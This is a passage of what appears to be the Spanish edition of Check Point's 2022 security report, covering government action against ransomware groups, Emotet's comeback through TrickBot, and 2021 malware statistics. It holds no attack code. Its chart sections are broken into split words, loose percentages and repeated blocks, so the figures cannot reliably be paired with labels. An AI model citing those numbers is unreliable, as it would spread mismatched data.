Este fue un año turbulento para muchos grupos de ransomware, no porque los gobiernos y las agencias del cumplimiento de la ley cambiaran su postura frente a los agentes organizados de amenaza. Han virado desde medidas preventivas y reactivas hacia operaciones ofensivas y proactivas que se dirigen a los mismos operadores de ransomware, como así también a sus fondos e infraestructura de soporte. El mayor cambio que pasó seguido al incidente de Colonial Pipeline en Mayo fue un ataque de ransomware de DarkSide que ocasionó el mayor desabastecimiento de combustible en la costa este de los Estados Unidos y, por lo tanto, ocasionó que la administración de Biden tuviera que intensificar sus esfuerzos para combatir la amenaza.

Los operadores de ransomware son el eje de toda la operación, ofreciendo no solo el mismo ransomware, sino también servicios de lavado de dinero y especialistas en negociación. Los diferentes programas de ransomware compiten por sedes, de manera que los grupo de ransomware están constantemente desarrollando herramientas y servicios más atractivos para sus programas de afiliados a fin de ayudarlos a destacarse en una comunidad ilegal competitiva. La reputación es un factor de motivación clave, ya que puede influenciar en las oportunidades del grupo para ganar grandes retornos o, incluso, conducir a la aprehensión por parte de las autoridades. Por lo tanto, no es de extrañarse que los cibercriminales medien sus disputas internas en los foros del tribunal, donde perder un caso puede costarle a un grupo su reputación y beneficios.

GRIETAS EN EL ECOSISTEMA DE RANSOMWARE Han pasado los días en que los operadores de ransomware negociaron un rescate de USD 200 por fotos de su familia. La economía actual de ransomware es una operación compleja de extorsión de millones de dólares por rescate, que mantiene cautiva a organizaciones completas bajo amenaza del cierre total del sistema. La evolución del modelo de negocio de ransomware está en el centro de este fenómeno. Ransomware como servicio (RaaS) presenta programas para socios a bajo costo de incorporación, lo que permite que cualquier atacante acompañe fácilmente a la tendencia. El atacante selecciona uno de los “proyectos” líderes de ransomware y sigue el manual de operaciones detallado, complementario y fácil de usar con todas las instrucciones para cada etapa del ataque. Si la intrusión fue exitosa, los operadores de ransomware y sus asociados comparten un porcentaje del rescate de la víctima. Este esquema extremadamente rentable permite que los atacantes alcancen un amplio rango de víctimas y ofrece retornos más altos para todos los implicados.

C A P Í T U L O 3

https://www.zdnet.com/article/colonial-pipeline-ransomware-attack-everything-you-need-to-know/ https://threatpost.com/scammers-cybercrime-court/176834/ https://www.bleepingcomputer.com/news/security/translated-conti-ransomware-playbook-gives-insight-into-attacks/

29CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 29CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

En Noviembre, una operación conjunta internacional llevada a cabo por Interpol denominada “Operación ciclón”, logró la incautación de la infraestructura y los arrestos de las sedes de lavado de dinero de Clop, el grupo responsable de la vulneración de Accellion, que era la fuente de numerosas extorsiones dobles y triples. Además, el Departamento de Justicia de los Estados Unidos y otras agencias federales persiguieron más acciones contra REvil. Estas acciones incluyeron los arrestos de los miembros, la incautación por el valor de USD 6 millones de dinero de rescate, la confiscación de los dispositivos y un programa de recompensa por un valor de USD 10 millones.

La reacción a estos desarrollos varió ampliamente dentro del ecosistema de ransomware. Algunos grupos mostraron hostilidad y aplicaron todavía más presión en sus víctimas para mantener alejadas a las autoridades de sus negocios. Por ejemplo, el ransomware Grief amenazó con borrar completamente las clave de cifrado de sus víctimas para que recurran a negociadores profesionales. De manera similar, RagnarLocker publicó en línea todo el contenido robado de las víctimas que contactaron al FBI o a otras agencias del cumplimiento de la ley.

Otros grupos parecieran haberse concentrado en adaptar y renombrarse para evitar ser demasiado cercanamente asociados con un ataque prominente. Darkside, por ejemplo, dejó la arena del ransomware durante un tiempo y al menos algunos de sus miembros se redenominaron como BlackMatter en Julio. Llevaron adelante ataques contra el proveedor de servicios de marketing Marketron, la compañía de tecnología japonesa Olympus y la

Más adelante en ese mes, el grupo delictivo DarkSide anunció que cerraban sus operaciones después de que se incautaran sus servidores y se robaran sus criptomonedas que usaban para pagar a los socios del programa de ransomware como servicio. En Junio, el Departamento de Justicia (Department of Justice, DOJ) actualizó un ransomware a la amenaza de seguridad nacional, colocándola al mismo nivel de prioridad que el terrorismo. El siguiente mayor incidente que rodeó a la plataforma MSP de Kaseya breach en Julio, después de que los perpetradores de REvil desaparecieran hasta de manera misteriosa, llevando su sitio web de fugas fuera de línea y aparentemente apagando su soporte al cliente. Sin embargo, esta interrupción fue efímera y el grupo resurgió en Septiembre. Entonces, desaparecieron otra vez en Octubre después de una presunta operación de las fuerzas de la ley que secuestró de manera exitosa su infraestructura y “Happy Blog”.

En Septiembre, la administración de Biden condujo la lucha contra el ransomware un paso más allá y anunció que comenzaría a sancionar el cambio de criptomonedas, billeteras y agentes que usaran agentes de amenaza para convertir los pagos de rescate en fondos tangibles. El intercambio SUEX establecido en Rusia fue el primero en agregarse a la lista de sanciones por su participación en las transacciones de rescate. El mes siguiente, la Unión Europea y 31 países más anunciaron que aunarían sus esfuerzos para interrumpir los canales adicionales de criptomonedas, en un intento por detener el proceso de lavado de dinero. Además, el gobierno australiano emitió su “Plan de acción de ransomware”, que incluye la formación de una nueva fuerza especial de tareas y castigos más duros para los agentes de ransomware.

C A P Í T U L O 3

https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/ https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/ https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/ https://www.theregister.com/2021/09/15/grief_corp_ransomware_negotiator_rage/ https://www.bleepingcomputer.com/news/security/ransomware-gang-threatens-to-leak-data-if-victim-contacts-fbi-police/ https://www.bankinfosecurity.com/blogs/blackmatter-ransomware-appears-to-be-spawn-darkside-p-3075 https://www.bankinfosecurity.com/blackmatter-knocks-marketron-off-air-a-17588 https://threatpost.com/blackmatter-ransomware-olympus/169423/ https://www.hackread.com/darkside-ransomware-quits-bitcoin-servers-seize/ https://www.reuters.com/technology/exclusive-us-give-ransomware-hacks-similar-priority-terrorism-official-says-2021-06-03/ https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/ https://heimdalsecurity.com/blog/revil-ransomwares-servers-have-resurfaced-after-being-down-for-two-months/ https://techcrunch.com/2021/10/18/revil-ransomware-group-goes-dark-after-its-tor-sites-were-hijacked/ https://gizmodo.com/biden-administration-reportedly-plans-sanctions-to-co-1847697017 https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210921 https://www.wsj.com/articles/white-house-ransomware-summit-eyes-tighter-global-scrutiny-for-crypto-11634227377 https://www.homeaffairs.gov.au/about-us/our-portfolios/cyber-security/strategy/australias-ransomware-action-plan

30CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 30CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Finalmente, este año pasado, también vimos signos de una comunidad de ransomware cediendo bajo presión o incluso cerrando la tienda, en conjunto, con algunos operadores abandonando completamente sus negocios. Por ejemplo, el grupo delictivo de cibercrimen Avaddon apareció por primera vez en Junio de 2020, pero solo un año después se vio obligado a cerrarse y lanzar claves de cifrado, sin dudas, debido al escrutinio creciente de las fuerzas de la ley. En otra instancia, el ransomware Conti apuntó a British Graff Jewelry, pero después emitió una disculpa al darse cuenta de que algunos datos robados pertenecían a las familias reales sauditas, de los Emiratos Árabes Unidos y de Qatar. Temiendo represalias, prometieron borrar los datos sin revisar. Los foros más importantes de delito cibernético prohibieron cualquier publicidad de ransomware desde su plataforma para evitar llamar la atención. Esto hizo que fuera más difícil para que los operadores se comunicaran de manera efectiva con las sedes, agregando el riesgo de ser capturadas.

Las medidas proactivas y las operaciones ofensivas de los gobiernos en todo el mundo se han arreglado para poner una marca notable en el ecosistema de ransomware, alterando las operaciones de ransomware y ocasionando estragos en la escena ilegal. A pesar de esto, millones de dólares en potencial de ingresos significan que probablemente veamos más “proyectos” de ransomware aparecer en 2022, con algunos exitosos sirviendo como modelo para los ataques venideros y mejorados. Un aporte que los operadores de ransomware podían tener de los eventos de 2021 es que el tipo de objetivos que eligen los operadores de ransomware puede ser la diferencia entre una

operación a largo plazo o una a muy corto plazo.

infraestructura crítica como la organización de granjeros New Cooperative en Iowa. Sin embargo, esta operación renovada fue breve, cuando en Noviembre, BlackMatter anunció que iban a cerrar debido a la presión de las autoridades. Incluso dijeron que los miembros de su equipo “no estaban disponibles después de las novedades más recientes”, aunque los expertos creen que esta salida fue el resultado de problemas de confianza con sus socios debido a la falla del cifrado, lo que permitió que la compañía de seguridad descifre los archivos de las víctimas. En un testamento final para la cooperación ilegal, BlackMatter se ha asociado con el ransomware LockBit ransomware y transferido a sus víctimas a la plataforma de LockBit a fin de facilitar la extorsión continua, justo antes de su desvanecimiento.

Desafortunadamente, no todos los grupos de ransomware mostraron esta cooperación armoniosa. El miedo a ser capturado por las autoridades se vio agravado por la desconfianza notable promovida por la competición constante. Por ejemplo, los operadores de REvil fueron encontrados engañando a sus sedes por el secuestro del proceso de negociación de rescate, usando chats dobles y puertas traseras para cortarlos de sus acciones. El grupo Conti experimentó una crisis interna después de que uno socio descontento filtrara el libro de estrategias de Conti, quejándose de bajas compensaciones.

C A P Í T U L O 3

https://blog.malwarebytes.com/ransomware/2021/06/another-one-bites-the-dust-avaddon-ransomware-group-shuts-down-operation/ https://www.dailymail.co.uk/news/article-10172879/Russian-cyber-hackers-carried-virtual-heist-jewellers-Graff-make-grovelling-apology.html https://latesthackingnews.com/2021/05/17/cybercrime-forums-xss-exploit-raidforums-ban-ransomware-ads https://www.zdnet.com/article/iowa-farm-services-provider-hit-with-blackmatter-ransomware-and-5-9-million-ransom/ https://therecord.media/blackmatter-ransomware-says-its-shutting-down-due-to-pressure-from-local-authorities/ https://therecord.media/free-decrypter-announced-for-past-blackmatter-ransomware-victims/ https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/ https://threatpost.com/revil-affiliates-leadership-cheated-ransom-payments/174972/ https://www.bankinfosecurity.com/conti-ransomware-threat-rising-as-group-gains-affiliates-a-17448

31CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

C A P Í T U L O 4

DESTACADOS DE MALWARE: EL REGRESO DE EMOTET

04

EMOTET, UNO DE LOS MÁS PELIGROSOS Y CONOCIDOS BOTNETS DE LA HISTORIA, ESTÁ DE VUELTA, A PESAR DE LOS GRANDES Y SINCRONIZADOS ESFUERZOS DE LA COMUNIDAD INTERNACIONAL Y LAS AGENCIAS DEL CUMPLIMIENTO DE LA LEY EN TODO EL MUNDO QUE OCASIONARON SU ELIMINACIÓN EN ENERO DE 2021.

32CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 32CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Emotet, uno de los más peligrosos y conocidos botnets de la historia, está de vuelta, a pesar de los grandes y sincronizados esfuerzos de la comunidad internacional y las agencias del cumplimiento de la ley en todo el mundo que ocasionaron su eliminación en Enero de 2021. Emotet, un troyano bancario convertido en un botnet modular, es conocido por su alcance masivo a más de 1,5 millones de computadoras infectadas en todo el mundo, entre miles de redes corporativas afectadas. Emotet se usó como una plataforma de distribución para ofrecer otras familias conocidas de malware como TrickBot, Qbot y Dridex, a menudo generando ataques de ransomware en toda la red que paralizó a organizaciones enteras. Se estimó que los daños infringidos fueron alrededor de los USD 2,5 mil millones antes de que se fueran apagados a la fuerza.

A L E X A N D R A G O F M A N Líder de equipo,

Check Point Research

C A P Í T U L O 4

Al final del año, el mundo se dio cuenta que incluso un grupo especial internacional, solo podía ralentizar a Emotet sin erradicarlo por completo.

Al menos alguno de sus miembros del grupo pudieron eludir la justicia y tenido tiempo para reorganizar, reagrupar y usar sus antiguas conexiones ilegales para lanzar una nueva campaña global mejorada de malspam.

TrickBot y Emotet son viejos conocidos, por eso no fue demasiado sorprendente que Emotet aprovechara el servicio de TrickBot como instalador para su propio resurgimiento”.

https://www.europol.europa.eu/media-press/newsroom/news/world%e2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action https://securelist.com/the-chronicles-of-emotet/99660/ https://www.wired.com/story/emotet-botnet-takedown/

33CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 33CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

El 14 de Noviembre, Emotet oficialmente resurgió ya que se observaron muestras en vivo, por primera vez, desde su neutralización. La resurrección de Emotet provino de una fuente sorprendente: El botnet TrickBot se usó para instalar muestras de Emotet en las máquinas infectadas con el malware TrickBot. A partir del día siguiente, Emotet regresó a su método característico de distribución, con campañas masivas de spam que esparcen troyanos mediante adjuntos de documentos maliciosos. Para reconstruir su red, los operadores de Emotet eligieron instalar su bot de spam en máquinas infectadas exitosamente, un método que les permitió distribuir malware a incluso más objetivos potenciales.

El servicio de TrickBot como instalador fue una opción natural para el renacimiento de Emotet, gracias a su abundante historial de colaboración. De hecho, esto puede sugerir que al menos alguno de estos socios antiguos de malware también estaban implicados en esta resurrección. Incluso TrickBot se interrumpió en 2020, y aun así persistió y apareció entre las mejores clasificaciones de familias de malware en Mayo, Junio y Septiembre de 2021. Durante el último año, Check Point Research detectó más de 140 000 víctimas de TrickBot en todo el mundo, afectando a casi 200 campañas de miles de redes afectadas. Esta base de instalación enorme hace que TrickBot sea la plataforma perfecta para volver a lanzar el nuevo botnet Emotet.

Emotet en sí volvió aún más fuerte con algunos agregados a su caja de herramientas. La variante actualizada usa la criptografía de curva elíptica como opuesta a la criptografía de RSA, mejoró sus técnicas de aplanamiento del flujo de control y agregó a sus métodos de entrega inicial el uso de paquetes de instaladores maliciosos de la aplicación de Windows que suplantan al software legítimo. Además, los investigadores encontraron que Emotet ahora está instalando balizas de Cobalt Strike directamente por primera vez, en lugar de familias de malware intermedio que, a su vez, hubieran instalado balizas de Cobalt Strike después de cierto tiempo. Cobalt Strike ha sido la piedra angular de los ataques de ransomware orientados en los años anteriores. Y este desarrollo desafortunado significa que la duración de la infección inicial de Emotet a un ataque total de ransomware solo se abrevió, dejando a los defensores con mucho menos tiempo para responder ante un ataque en marcha.

Desde su regreso, Check Point Research observó que el volumen de la actividad de Emotet fue al menos del 50% del nivel que vimos en Enero de 2021, justo antes de la neutralización. Esta tendencia en aumento continuó durante Diciembre con muchas campañas de fin de año y se prevé que continúe en 2022, al menos hasta el siguiente intento de neutralización.

C A P Í T U L O 4

https://cyber.wtf/2021/11/15/guess-whos-back/ https://isc.sans.edu/diary/28044 https://intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts https://blog.checkpoint.com/2021/06/10/check-point-softwares-may-2021-most-wanted-malware-dridex-drops-from-list-while-trickbot-rises-to-top/ https://blog.checkpoint.com/2021/07/13/june-2021s-most-wanted-malware-trickbot-remains-on-top/ https://blog.checkpoint.com/2021/10/08/september-2021s-most-wanted-malware-trickbot-once-again-tops-the-list/ https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/ https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/

34CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

C A P Í T U L O 5

ESTADÍSTICAS GLOBALES 05

EN 2021, HUBO UN INCREMENTO DEL 50% EN PROMEDIO DE ATAQUES POR SEMANA EN LAS REDES CORPORATIVAS EN COMPARACIÓN CON 2020.

35CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 35CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

GLOBAL

AMÉRICA

CATEGORÍAS DE ATAQUES CIBERNÉTICOS SEGÚN LA REGIÓN

Figura 1: Porcentaje de redes corporativas afectadas por cada tipo de malware de manera global.

Figura 2: Porcentaje de redes corporativas afectadas por cada tipo de malware en América.

31%

21%

19%

19%

14%

8%

BOTNET

INFOSTEALER

CRYPTOMINERS

BANKING

MOBILE

RANSOMWARE

BOTNET

INFOSTEALER

CRYPTOMINERS

BANKING

MOBILE

RANSOMWARE

25%

18%

15%

15%

14%

6%

35CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

36CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

CATEGORÍAS DE ATAQUES CIBERNÉTICOS SEGÚN LA REGIÓN

EMEA

ASIA-PACÍFICO (APAC)

Figura 3: Porcentaje de redes corporativas afectadas por cada tipo de malware en EMEA.

Figura 4: Porcentaje de redes corporativas afectadas por cada tipo de malware en APAC.

BOTNET

INFOSTEALER

CRYPTOMINERS

BANKING

MOBILE

RANSOMWARE

30%

23%

19%

19%

14%

8%

BOTNET

INFOSTEALER

CRYPTOMINERS

BANKING

MOBILE

RANSOMWARE

43%

30%

25%

25%

13%

10%

36CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

37CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 37CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

MAPA INDICATIVO DE AMENA Z AS GLOBALES

Figura 5. Mapa indicativo de amenazas globales

En el mapa, se muestra el índice de riesgo de amenazas cibernéticas a nivel mundial, lo que demuestra las principales áreas de riesgo en todo el mundo.*

* Más oscuro = Mayor riesgo * Gris = datos insuficientes

C A P Í T U L O 5

38CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 38CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

1605 (+75%)Education / Research Government / Military

Communications

ISP / MSP

Healthcare

SI / VAR / Distributor

Utilities

Manufacturing

Finance / Banking

Insurance / Legal

Leisure / Hospitality

Consultant

Software Vendor

Retail / Wholesale

Transportation

Hardware Vendor

1136 1079 1068

830 778

736 704 703

636 595

576 536

526 501

367

(+47%)

(+51%)

(+67%)

(+71%)

(+18%)

(+46%)

(+41%)

(+53%)

(+68%)

(+40%)

(+73%)

(+146%)

(+39%)

(+34%)

(+16%)

Figura 6: Promedio de ataques semanales por organización por Industry 2021, en comparación con 2020.

Durante 2021, los ataques cibernéticos globales contra las redes corporativas se han incrementado un 50% en comparación con 2020. La categoría “Educación/ Investigación” lidera como el sector más atacado, con un promedio de1605 ataques por organización cada semana (un incremento del 75%), mientras que la categoría “Proveedor de software” muestra el mayor crecimiento anual, con un incremento del 146%. El aumento contra los proveedores de software va a la par con la tendencia siempre creciente de ataques a la cadena de suministro observados durante 2021.

C A P Í T U L O 5

39CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 39CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

PRINCIPALES TIPOS DE ARCHIVOS MALICIOSOS: L A WEB FRENTE AL CORREO ELECTRÓNICO

Figura 7: Web: principales tipos de archivos maliciosos.

Figura 8: Correo electrónico: principales tipos de archivos maliciosos.

ex e

pd f

do c xls xls

x jar ba t

do cx ps

1 ap

k ot

he r

52%

20%

5% 3% 3% 2% 2% 1% 1% 1%

10%

ex e

xlx s

pd f rtf do

c xls

m do

cx xls xls b

pp t

ot he

r

34%

16%

9% 7% 7% 6% 6% 5%

3% 2%

6%

C A P Í T U L O 5

40CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 40CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Figura 9: Protocolos de distribución: el correo electrónico frente a los vectores de ataque web en 2019-2021.

64%

36%

83%

17%

84%

16%

EMAIL WEB

2019 2020 2021

Los gráficos anteriores indican que el vector de ataque de correo electrónico se ha establecido de manera uniforme como favorito, en comparación con el uso cada vez menos de los sitios web para distribuir cargas útiles de malware desde principios de 2020.

Ya sea que se utilice en un ataque dirigido o como parte en campañas oportunistas realizadas por un atacante principiante, los ataques basados en correo electrónico permiten una fácil distribución de malware a un amplio conjunto de objetivos y corporaciones.

Una de las razones de este aumento de los ataques basados en correo electrónico es la gran cantidad de campañas de alto perfil patrocinadas y dirigidas por grandes grupos delictivos, que distribuyen las familias de malware más prominentes en la actualidad, como Trickbot, Dridex, Qbot, IcedID o Emotet.

Una vez que estos grupos delictivos se dieron cuenta de la efectividad de una campaña de correo no deseado con documentos adjuntos maliciosos de Office, la han utilizado casi exclusivamente como su principal vector de infección para nuevas redes.

C A P Í T U L O 5

41CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 41CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

PRINCIPALES FAMILIAS DE MALWARE

Figura 10: Malware más frecuente a nivel global. Porcentaje de redes corporativas afectadas por cada familia de malware.

Figura 11: Malware más frecuente en América.

AMÉRICA

Tr ick

bo t

Qb ot

Fo rm

bo ok

Em ot

et

Dr id

ex

Ag en

tT es

la

Ph or

pi ex

Re m

co s

Gl up

te ba

XM Ri

g

11.0%

5.2% 5.0% 4.9% 4.4% 4.1% 4.0% 4.0% 3.7% 3.5%

GLOBAL

Tr ick

bo t

Re m

co s

Fo rm

bo ok

Ph or

pi ex

Dr id

ex

Em ot

et Qb

ot

Gl up

te ba

XM Ri

g

Ra cc

oo n

9.7%

3.6% 3.5% 3.5% 3.0% 3.0% 2.9% 2.6% 2.4% 2.4%

ESTADÍSTICAS DE MALWARE A NIVEL GLOBAL Las comparaciones de datos que se presentan en las siguientes secciones de este informe se basan en datos extraídos del Mapa de amenazas cibernéticas ThreatCloud de Check Point entre Enero y Diciembre de 2021.

Para cada una de las siguientes regiones, presentamos los malware más frecuentes.

C A P Í T U L O 5

https://threatmap.checkpoint.com/ThreatPortal/livemap.html

42CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 42CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Figura 12: Malware más frecuente en EMEA.

EUROPA, ORIENTE MEDIO Y ÁFRICA (EMEA)

Figura 13: Malware más frecuente en APAC.

ASIA-PACÍFICO (APAC)

Tr ick

bo t

Qb ot

Em ot

et

Dr id

ex

Fo rm

bo ok

Ag en

tT es

la

Re m

co s

Ph or

pi ex

XM Ri

g

Gl up

te ba

10.8%

7.8%

5.9% 5.4% 5.0% 4.7%

4.2% 3.6% 3.6% 3.3%

Tr ick

bo t

Fo rm

bo ok

Ra m

ni t

Gl up

te ba

Ag en

tT es

la

Ph or

pi ex

Em ot

et

XM Ri

g

Dr id

ex

Ur sn

if

14.5%

7.8% 7.5% 7.1% 6.9% 6.2% 6.0% 5.7%

4.8% 4.8%

C A P Í T U L O 5

43CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 43CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

ANÁLISIS A NIVEL GLOBAL DE LOS PRINCIPALES MALWARE Algunos cambios notables desde nuestra última clasificación global y anual, son que RigEK (kit de vulneración) y el interceptor LokiBot ya no se encuentran presentes en nuestro top 10, reemplazado por el botnet Glupteba y el RAT Remcos.

TrickBot ascendió a la cima de la clasificación en Febrero, reemplazando a Emotet y mantuvo esta clasificación por el resto de 2021. TrickBot es un botnet modular y un troyano bancario que se dirige al sistema operativo Windows. Se reconoció con el resurgimiento de Emotet en Noviembre de 2021 ya que se encontró distribuyendo su malware miembro. TrickBot se está actualizando constantemente con capacidades, funciones y vectores de distribución mejorados, y convirtiéndose en un malware flexible y personalizable que se puede distribuir como parte de campañas de multipropósito. Se sirvió de medios conocidos para el acceso inicial en los ataques orientados seguidos por malware como Ryuk, Conti o Bazar. A pesar del breve cierre de TrickBot en Octubre de 2020, permanecieron prominentes en nuestra clasificación de mejores malware durante 2021 y estuvo implicado en uno de los ataques más serios del año, un ataque de ransomware Conti en el Health Service Executive de Irlanda.

Phorpiex es un botnet que en su auge controló a más de un millón de hosts infectados. Es conocido por distribuir otras familias de malware a través de campañas de spam, así como también por impulsar campañas de extorsión sexual y de spam de gran escala. Phorpiex, que alcanzó su mínimo a mitad del año, finalizando con una clasificación más alta para fines de 2021 que hace un año atrás. En Diciembre, Check Point Research detectó el resurgimiento de Phorpiex con una variante nueva denominada “Twizt”, que permitió operarla en modo punto a punto sin servidores de C&C activos. En un año, los bots de Phorpiex secuestraron de manera exitosa 969 transacciones y robaron 3,64 Bitcoin, 55,87 Ether y USD 55 000 en tokens ERC20, contabilizando casi mitad de un millón de dólares estadounidenses.

C A P Í T U L O 5

https://blog.checkpoint.com/2021/03/11/february-2021s-most-wanted-malware-trickbot-takes-over-following-emotet-shutdown/ https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ https://threatpost.com/emotet-resurfaces-trickbot/176362/ https://www.raconteur.net/technology/the-five-most-important-ransomware-attacks-of-2021/ https://research.checkpoint.com/2019/in-the-footsteps-of-a-sextortion-campaign/ https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/

44CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 44CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Figura 14: Botnets más frecuentes a nivel global

Figura 16: Botnets más frecuentes en EMEA

GLOBAL

Figura 15: Botnets más frecuentes en América

Figura 17: Botnets más frecuentes en APAC

AMÉRICA

EUROPA, ORIENTE MEDIO Y ÁFRICA (EMEA) ASIA-PACÍFICO (APAC)

35%

12% 11%

11%

10%

27%

19% 15%

13%

9%

8%

29%

14%

13% 12%

12%

TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Glupteba Phorpiex Emotet Dridex MyloBot Other

11% 10%

27%

13%

11%11%

9%

23%

10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Phorpiex Dridex Emotet Qbot Glupteba Other

10%

9%

6%

35%

12% 11%

11%

10%

27%

19% 15%

13%

9%

8%

29%

14%

13% 12%

12%

TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Glupteba Phorpiex Emotet Dridex MyloBot Other

11% 10%

27%

13%

11%11%

9%

23%

10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Phorpiex Dridex Emotet Qbot Glupteba Other

10%

9%

6%

35%

12% 11%

11%

10%

27%

19% 15%

13%

9%

8%

29%

14%

13% 12%

12%

TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Glupteba Phorpiex Emotet Dridex MyloBot Other

11% 10%

27%

13%

11%11%

9%

23%

10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Phorpiex Dridex Emotet Qbot Glupteba Other

10%

9%

6%

35%

12% 11%

11%

10%

27%

19% 15%

13%

9%

8%

29%

14%

13% 12%

12%

TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Glupteba Phorpiex Emotet Dridex MyloBot Other

11% 10%

27%

13%

11%11%

9%

23%

10% TrickBot Qbot Emotet Dridex Phorpiex Glupteba Other

TrickBot Phorpiex Dridex Emotet Qbot Glupteba Other

10%

9%

6%

PRINCIPALES BOTNE TS

C A P Í T U L O 5

45CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 45CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

ANÁLISIS GLOBAL DE BOTNETS En general, estamos viendo las mismas familias de malware en nuestra clasificación global de mejores botnets como en 2020, sin menores cambios en la prevalencia de cada familia. Dridex, por ejemplo, empeoró del segundo al cuarto lugar mientras que TrickBot ascendió al primer puesto.

Emotet, uno de los grupos de malware más conocidos, ha estado operando en intervalos desde 2014, primero como un troyano bancario y, después, como un botnet. Aparece ahora en el puesto tres en la clasificación de mejores botnets. Emotet tuvo una amplia propagación antes de su interrupción en Enero de 2021, afectando a más de 1,5 millones de máquinas globalmente con daños estimados en torno a los USD 2,5 mil millones. Es conocido por propagar otras familias de malware, incluyendo a TrickBot, Qbot y más.

El mercado de botnet este año se afectó drásticamente por la caída de Emotet. Emotet es una de las operaciones de botnet de PC más grandes y su ausencia dejó un puesto que ocupó TrickBot, IcedID, y, más recientemente, Phorpiex. El 15 de Noviembre, solo 10 meses después de su neutralización, las máquinas infectadas con TrickBot empezaron a instalar muestras de Emotet. Las computadores fueron cada vez más afectadas por una gran campaña de malspam que aprovechó los documentos maliciosos que contenían la carga útil de Emotet.

Advertimos que nuestras clasificaciones para el primer semestre de 2021 y el 2021 global mostraron a Emotet entre los mejores tres lugares, a pesar que nueves meses de inactividad, un tributo a su inigualable poder.

C A P Í T U L O 5

https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/

46CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 46CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Figura 18: Principales malware de interceptación a nivel global

Figura 20: Principales malware de interceptación en EMEA

GLOBAL

Figura 19: Principales malware de interceptación en América

Figura 21: Principales malware de interceptación en APAC

AMÉRICA

EUROPA, ORIENTE MEDIO Y ÁFRICA (EMEA) ASIA-PACÍFICO (APAC)

18%

12%

10%

8%6%

14%

13%

9%

8% 7%7%

Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger Other

Formbook AgentTesla LokiBot Vidar NanoCore Raccoon Other

7%

18%

16%

11% 8%7%

33%

16%

13%

9%

9%

38%

8%7%

Formbook AgentTesla Raccoon LokiBot Vidar NanoCore Other

Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot Other

39%

42%

7%

18%

12%

10%

8%6%

14%

13%

9%

8% 7%7%

Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger Other

Formbook AgentTesla LokiBot Vidar NanoCore Raccoon Other

7%

18%

16%

11% 8%7%

33%

16%

13%

9%

9%

38%

8%7%

Formbook AgentTesla Raccoon LokiBot Vidar NanoCore Other

Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot Other

39%

42%

7%

18%

12%

10%

8%6%

14%

13%

9%

8% 7%7%

Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger Other

Formbook AgentTesla LokiBot Vidar NanoCore Raccoon Other

7%

18%

16%

11% 8%7%

33%

16%

